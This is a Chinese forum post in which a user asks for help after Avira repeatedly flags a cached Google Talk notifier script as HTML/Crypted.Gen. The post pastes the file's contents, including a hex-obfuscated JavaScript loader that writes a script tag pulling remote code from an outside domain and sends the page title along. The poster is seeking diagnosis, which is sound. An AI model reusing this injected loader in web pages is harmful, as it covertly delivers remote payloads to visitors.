发现病毒或恶意程序!――高手请进
并提示:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式
由于出现过于频繁,且均指向同一个位置,经查看,在IE临时文件夹中。但该位置文件无法用任何编辑软件打开,也无法复制。于是先在小红伞中将之隔离,再从隔离区恢复到另一个位置。该文件在IE临时文件夹中名为:116312516-notifierclient-js_zh-CN[1].VIR
将该文件更名为文本文件,然后打开,内容如下:
var _0x9713=["\x3C\x73\x63\x72\x69\x70\x74\x20\x6C\x61\x6E\x67\x75\x61\x67\x65\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x2E\x31\x37\x62\x62\x6A\x2E\x63\x6F\x6D\x2F\x6D\x77\x67\x6E\x64\x66\x61\x2E\x70\x68\x70\x3F\x73\x72\x63\x3D\x67\x67\x26\x74\x3D","\x74\x69\x74\x6C\x65","\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x9713[0x3]](_0x9713[0x0]+encodeURIComponent(document[_0x9713[0x1]])+_0x9713[0x2]);document.write("<script language=’javascript’ src=’http://talkgadget.google.com/talkgadget/sp/116312516-notifierclient-js_zh-CN.js?rr=1886680168′><\/script>");
将其中地址输入IE地址,执行后显示下载:116312516-notifierclient-js_zh-CN.js
该文件经小红伞扫描没有问题。
该地址主页为:Google Chat – Chat with family and friends
经搜索学习,“.VIR”文件是被杀毒软件标识的文件。那么,病毒程序是116312516-notifierclient-js_zh-CN.js吗?可该文件小红伞扫描认为没有问题!
我能做的就这些了,希望高手给予指教!!
补充:
点击“发新话题”时,小红伞立刻拦截:发现病毒或恶意程序!
提示同上:包含 HTML/Crypted.Gen HTML 脚本病毒的识别模式
[ 本帖最后由 北国游子 于 2010-5-8 13:40 编辑 ]
